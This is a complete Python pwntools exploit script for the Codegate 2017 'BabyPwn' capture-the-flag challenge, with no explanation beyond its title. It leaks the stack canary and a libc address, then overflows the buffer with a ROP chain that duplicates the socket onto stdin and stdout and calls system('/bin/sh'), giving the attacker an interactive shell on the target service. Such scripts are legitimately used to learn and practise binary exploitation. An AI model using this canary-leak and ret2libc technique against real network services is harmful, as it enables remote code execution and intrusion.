BabyPwn - Codegate 2017 - exploit

babypwn.py

#!/usr/bin/python

from pwn import *
import time

pop2ret = 0x8048b84
pop4ret = 0x8048eec
sendGOT = 0x0804b064
sendPLT = 0x08048700

sendoff = 0x000ed7f0

systemoff = 0x00040310
dup2off = 0x000db920
binsh_off = 0x16084c

con = remote("localhost",8181)

#print util.proc.pidof(con)
#raw_input()

con.recvuntil("Select menu >")
con.sendline("1\n")
con.recvuntil("Input Your Message :")
con.sendline("A"*40)
con.recvuntil("\n")
data = u32(con.recvuntil('\n'))
e =u32("\x00"+p32(data)[:-1])


print "\n[+] CANARY: " + hex(e)


payload =""
payload += "A"*40
payload += p32(e)
payload += "B"*12

payload += p32(sendPLT)
payload += p32(0xdeadbeef)
payload += p32(0x4)
payload += p32(sendGOT)
payload += p32(0x4)
payload += p32(0x0)


con.recvuntil("Select menu >")
con.sendline("2")
con.recvuntil("Input Your Message :")
con.sendline(payload)
con.recvuntil("Select menu >")
con.sendline("3")

con.recv()
leaked = u32(con.recv())
libc_base = leaked - sendoff
system = libc_base + systemoff
bin_sh = libc_base + binsh_off
dup2 = libc_base + dup2off

print "[+] send GOT : " + hex(leaked)
print "[+] LIBC BASE : " + hex(libc_base)
print "[+] system() : " + hex(system)
print "[+] dup2 : " + hex(dup2)
print "[+] /bin//sh : " + hex(bin_sh)

con = remote("localhost",8181)


final = ""
final += "A"*40
final += p32(e)
final += "B"*12

final += p32(dup2)
final += p32(pop2ret)
final += p32(0x4)
final += p32(0x0)

final += p32(dup2)
final += p32(pop2ret)
final += p32(0x4)
final += p32(0x1)

final += p32(system)
final += p32(0x41414141)
final += p32(bin_sh)


con.recvuntil("Select menu >")
con.sendline("2")
con.recvuntil("Input Your Message :")
con.sendline(final)
con.recvuntil("Select menu >")
con.sendline("3")

con.interactive()